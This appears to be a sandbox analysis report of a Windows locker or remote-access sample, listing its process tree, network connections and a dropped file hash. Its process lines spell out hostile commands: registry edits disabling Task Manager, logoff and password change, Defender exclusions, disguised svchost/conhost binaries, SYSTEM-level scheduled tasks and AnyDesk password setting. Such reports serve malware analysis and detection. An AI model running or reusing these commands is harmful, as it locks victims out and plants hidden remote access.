"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5864,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5324,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6272,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6268 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --service

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6416,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8

C:\ProgramData\AnyDesk.exe

"C:\ProgramData\AnyDesk.exe" --control

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6652,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:1

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --remove-password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7020,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7028 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7184,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:8

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=7348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7356 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7368,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7640,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:8

C:\Users\Admin\AppData\Roaming\locked.exe

"C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=7976,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=8104,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=8136 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2fc 0x300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6064,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5932 /prefetch:8

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2362.tmp\2363.tmp\2364.bat C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv Zaa7TMQPjES0SaK7eWRoQg.0.1

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\timeout.exe

timeout /T 2 /NOBREAK

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=8576,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 boot.net.anydesk.com udp
US 212.102.60.111:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-79bdf984.net.anydesk.com udp
GB 195.181.165.153:443 relay-79bdf984.net.anydesk.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 111.60.102.212.in-addr.arpa udp
US 8.8.8.8:53 153.165.181.195.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 ctt.ac udp
US 8.8.8.8:53 ctt.ac udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 134.209.68.5:443 ctt.ac tcp
US 8.8.8.8:53 ctt.ac udp
US 134.209.68.5:443 ctt.ac tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
NL 2.18.121.23:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
BE 2.21.17.194:443 www.microsoft.com tcp
US 8.8.8.8:53 clicktotweet.com udp
US 8.8.8.8:53 clicktotweet.com udp
US 8.8.8.8:53 clicktotweet.com udp
US 134.209.68.5:443 clicktotweet.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 5.68.209.134.in-addr.arpa udp
US 8.8.8.8:53 239.45.30.184.in-addr.arpa udp
US 8.8.8.8:53 23.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 194.17.21.2.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 134.209.68.5:443 clicktotweet.com tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 clicktotweet.com udp
US 104.244.42.193:443 twitter.com tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 clicktotweet.com udp
US 104.244.42.193:443 twitter.com tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 api.twitter.com udp
US 104.244.42.194:443 api.twitter.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 api.x.com udp
US 8.8.8.8:53 api.x.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 8.8.8.8:53 pbs.twimg.com udp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 104.244.42.130:443 api.x.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 video.twimg.com udp
GB 199.232.56.158:443 video.twimg.com tcp
PL 93.184.220.70:443 pbs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 t.co udp
US 104.244.42.133:443 t.co tcp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 200.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 157.167.233.64.in-addr.arpa udp
US 8.8.8.8:53 193.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 194.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 130.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 158.56.232.199.in-addr.arpa udp
US 8.8.8.8:53 70.220.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
IE 209.85.203.84:443 accounts.google.com tcp
US 104.244.42.194:443 api.twitter.com tcp
US 104.244.42.194:443 api.twitter.com tcp
US 104.244.42.194:443 api.twitter.com tcp
IE 209.85.203.84:443 accounts.google.com udp
IE 209.85.203.84:443 accounts.google.com udp
BE 2.17.107.123:443 www.bing.com tcp
US 8.8.8.8:53 84.203.85.209.in-addr.arpa udp
US 8.8.8.8:53 123.107.17.2.in-addr.arpa udp
BE 2.17.107.123:443 www.bing.com udp
N/A 224.0.0.251:5353 udp
BE 88.221.83.202:443 www.bing.com tcp
US 8.8.8.8:53 202.83.221.88.in-addr.arpa udp
US 212.102.60.111:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 appleid.cdn-apple.com udp
US 8.8.8.8:53 appleid.cdn-apple.com udp
IE 209.85.203.84:443 accounts.google.com tcp
BE 104.68.84.171:443 appleid.cdn-apple.com tcp
US 8.8.8.8:53 relay-98c428ee.net.anydesk.com udp
GB 195.181.165.154:443 relay-98c428ee.net.anydesk.com tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
IE 209.85.203.84:443 accounts.google.com tcp
GB 142.250.200.14:443 google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 171.84.68.104.in-addr.arpa udp
US 8.8.8.8:53 154.165.181.195.in-addr.arpa udp
GB 142.250.178.4:443 www.google.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 accounts.google.com udp
IE 209.85.203.84:443 accounts.google.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 4.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.187.206:443 play.google.com tcp
US 104.19.130.98:443 spankbang.com udp
US 8.8.8.8:53 tb.sb-cd.com udp
US 8.8.8.8:53 tb.sb-cd.com udp
US 8.8.8.8:53 hls-uranus.sb-cd.com udp
US 8.8.8.8:53 hls-uranus.sb-cd.com udp
US 8.8.8.8:53 assets.sb-cd.com udp
US 8.8.8.8:53 assets.sb-cd.com udp
US 104.16.4.5:443 assets.sb-cd.com udp
US 104.16.4.5:443 assets.sb-cd.com udp
US 104.16.4.5:443 assets.sb-cd.com udp
US 8.8.8.8:53 c.ptgncdn.com udp
US 8.8.8.8:53 c.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 104.16.5.5:443 assets.sb-cd.com udp
GB 89.187.167.6:443 c.ptgncdn.com tcp
GB 89.187.167.6:443 c.ptgncdn.com tcp
US 104.18.33.166:443 deliver.ptgncdn.com udp
US 104.18.33.166:443 deliver.ptgncdn.com udp
US 104.16.5.5:443 assets.sb-cd.com udp
US 8.8.8.8:53 98.130.19.104.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 5.4.16.104.in-addr.arpa udp
US 8.8.8.8:53 5.5.16.104.in-addr.arpa udp
US 8.8.8.8:53 166.33.18.104.in-addr.arpa udp
US 8.8.8.8:53 6.167.187.89.in-addr.arpa udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 flagb93361.spankbang.com udp
US 104.19.130.98:443 flagb93361.spankbang.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 spankbang.com udp
US 104.18.33.166:443 deliver.ptgncdn.com udp
US 104.19.130.98:443 spankbang.com udp
US 8.8.8.8:53 creative.xlviirdr.com udp
US 8.8.8.8:53 creative.xlviirdr.com udp
US 104.18.40.50:443 creative.xlviirdr.com udp
US 8.8.8.8:53 14.24.17.104.in-addr.arpa udp
US 8.8.8.8:53 73.80.16.104.in-addr.arpa udp
US 8.8.8.8:53 static.javhd.com udp
US 8.8.8.8:53 static.javhd.com udp
US 8.8.8.8:53 static.javhd.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 50.40.18.104.in-addr.arpa udp
GB 195.181.164.19:443 static.javhd.com tcp
GB 195.181.164.16:443 a.magsrv.com tcp
US 8.8.8.8:53 stats.postgen.com udp
US 8.8.8.8:53 stats.postgen.com udp
US 74.117.182.35:443 stats.postgen.com tcp
US 74.117.182.35:443 stats.postgen.com tcp
US 8.8.8.8:53 a.magsrv.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
US 74.117.182.35:443 stats.postgen.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 s.magsrv.com udp
US 8.8.8.8:53 s.magsrv.com udp
NL 95.211.229.245:443 s.magsrv.com tcp
US 8.8.8.8:53 static.javhd.com udp
US 8.8.8.8:53 static.javhd.com udp
NL 95.211.229.245:443 s.magsrv.com tcp
US 8.8.8.8:53 go.xlviirdr.com udp
US 8.8.8.8:53 go.xlviirdr.com udp
US 8.8.8.8:53 video.ktkjmp.com udp
US 8.8.8.8:53 video.ktkjmp.com udp
US 104.18.40.50:443 go.xlviirdr.com udp
US 104.19.130.98:443 spankbang.com udp
US 104.18.53.225:443 video.ktkjmp.com udp
US 172.64.147.206:443 go.xlviirdr.com udp
US 172.64.147.206:443 go.xlviirdr.com udp
US 8.8.8.8:53 img.strpst.com udp
US 8.8.8.8:53 img.strpst.com udp
US 104.17.11.106:443 img.strpst.com udp
US 8.8.8.8:53 go.xxxviijmp.com udp
US 8.8.8.8:53 go.xxxviijmp.com udp
US 104.18.40.50:443 go.xxxviijmp.com udp
US 8.8.8.8:53 vstream-13.sb-cd.com udp
US 8.8.8.8:53 vstream-13.sb-cd.com udp
DE 212.102.56.137:443 vstream-13.sb-cd.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 19.164.181.195.in-addr.arpa udp
US 8.8.8.8:53 16.164.181.195.in-addr.arpa udp
US 8.8.8.8:53 35.182.117.74.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 245.229.211.95.in-addr.arpa udp
US 8.8.8.8:53 225.53.18.104.in-addr.arpa udp
US 8.8.8.8:53 206.147.64.172.in-addr.arpa udp
US 8.8.8.8:53 106.11.17.104.in-addr.arpa udp
US 8.8.8.8:53 137.56.102.212.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 104.18.53.225:443 video.ktkjmp.com udp
US 8.8.8.8:53 edge-hls.sacdnssedge.com udp
US 8.8.8.8:53 edge-hls.sacdnssedge.com udp
GB 195.181.164.11:443 edge-hls.sacdnssedge.com tcp
US 8.8.8.8:53 b-hls-10.sacdnssedge.com udp
US 8.8.8.8:53 b-hls-10.sacdnssedge.com udp
GB 195.181.164.24:443 b-hls-10.sacdnssedge.com tcp
US 8.8.8.8:53 11.164.181.195.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
GB 195.181.164.11:443 b-hls-10.sacdnssedge.com tcp
GB 195.181.164.11:443 b-hls-10.sacdnssedge.com tcp
GB 195.181.164.11:443 b-hls-10.sacdnssedge.com tcp
US 8.8.8.8:53 24.164.181.195.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 s3t3d2y8.afcdn.net udp
US 8.8.8.8:53 s3t3d2y8.afcdn.net udp
GB 89.187.167.6:443 s3t3d2y8.afcdn.net tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 216.239.34.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
BE 88.221.83.202:443 www.bing.com tcp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:42781 udp
N/A 239.255.102.18:21828 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:13622 udp
N/A 239.255.102.18:11577 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:49362 udp
N/A 239.255.102.18:6996 udp
US 8.8.8.8:53 api.playanext.com udp
GB 18.245.187.52:80 api.playanext.com tcp
US 8.8.8.8:53 52.187.245.18.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\E781.tmp\E782.tmp\E783.vbs

MD5 3c37e86d3572f4f291e0bf5c9ab78e41
